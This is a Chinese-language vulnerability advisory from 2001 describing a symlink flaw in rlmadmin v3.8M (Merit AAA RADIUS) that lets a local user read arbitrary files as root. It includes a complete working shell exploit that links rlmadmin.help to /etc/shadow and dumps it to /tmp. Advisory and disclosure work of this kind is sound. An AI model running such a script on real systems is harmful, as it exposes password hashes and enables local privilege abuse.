rlmadmin v3.8M 存在符号连接漏洞发布时间:2001-09-08 更新时间:2001-09-08 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 rlmadmin v3.8M详细描述 rlmadmin是RADIUS使用的用户管理工具,来自Merit AAA服务程序包, (http://www.merit.edu/michnet/dial-in/aaa/),使用这个程序和简单的符号连接,你可以以ROOT身份查看任意文件。 使用rlmadmin的-d选项允许你指定目录来查找配置文件,并在目录中查找如下文件如: dictionary-解析请求和产生响应的字典转化 rlmadmin.help-是在启动时候显示的help文件 vendors-供应商信息 问题在当rlmadmin读rlmadmin.help文件发生,如果此文件连接到任何文件如 /etc/shadow,程序就盲目遵循符号连接,导致敏感信息被泄露。 测试代码 ------------- #!/bin/sh # -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # rlmadmin view file symlink vulnerability # # (c)oded 2001 Digital Shadow # # www.ministryofpeace.co.uk # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- # bloc=/usr/private/etc # executable file location cloc=/usr/private/etc/raddb # config file location file=/etc/shadow # file to read echo == rlmadmin exploit - visit \ www.ministryofpeace.co.uk for more! echo = Initialising... mkdir /tmp/peace; cd /tmp/peace cp $cloc/dictionary $cloc/vendors . ln -s $file rlmadmin.help echo = Exploiting... echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log mv peace.log /tmp; rm dictionary rlmadmin.help vendors echo = Done! echo == Now look in /tmp/peace.log! 解决方案 尚无 相关信息 Digital Shadow (wodahs@gmx.net) |
